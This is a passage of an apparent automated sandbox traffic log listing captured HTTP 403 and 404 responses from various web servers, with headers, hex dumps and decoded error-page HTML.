73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:07 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: RQvnDyN5n1orR2cJk2hJbg==,sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVgytu5l6kIxdgTtRDyDYzpL,m0j2EEknGIVUW/liY8BLLrC01ptYXsMHWXBWBuBw+5rJftmKrOReD3ukbbas4YDoX-Wix-Request-Id: 1678431367.8592011016076220707X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:08 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: Qizr2MOzfO8jjTBKBVmOj6nPWIDxfKj16yM6xXYJ3IE=,GXNXSWFXisshliUcwO20Naon851uhK6HRsxREnrEO9Y+DYuMfmtB4kgQ8tW/ClTAmuOkfcTSJaUOHlD2KQbqrA==,m0j2EEknGIVUW/liY8BLLuxuneWIxsREdYD1q4BIALwG/hKs8AeY1T4OIbgnD+yxX-Wix-Request-Id: 1678431368.477873862359123643X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><cente
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:56:08 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1561X-XSS-Protection: 0X-Frame-Options: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:08 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:09 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RUGnPrpEmGzYzZlB%2BfYjGGmoIZsnDuS15WzZiDcm6i17qItUeMHs0%2BIZg%2F2PSgfG%2BpjipMH3TZ5a5ivmUDIgmEQjB8KTaDtKUgd5kW5MRt5vy67czQR13QpsX5I%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a7f84c203a72-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:09 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:09 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.1.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bq6BmPWrPnAvWOEoHgtSu1wJkwX9Wv4LP0GnWXqG4%2FY5UQn2o%2Bk4uIEY%2FdL2vsc7JqvkoYA61UsM7v6DPE%2BhIGKgLKSM5bhx%2FGK2J2H7NH0g%2FurCXon113wGF7s6wQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a7fbfbfb2c1a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 63 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d Data Ascii: 1c1d<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <m
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Fri, 10 Mar 2023 06:56:09 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:09 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:10 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 12 Aug 2021 07:53:38 GMTAccept-Ranges: bytesContent-Length: 15513Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 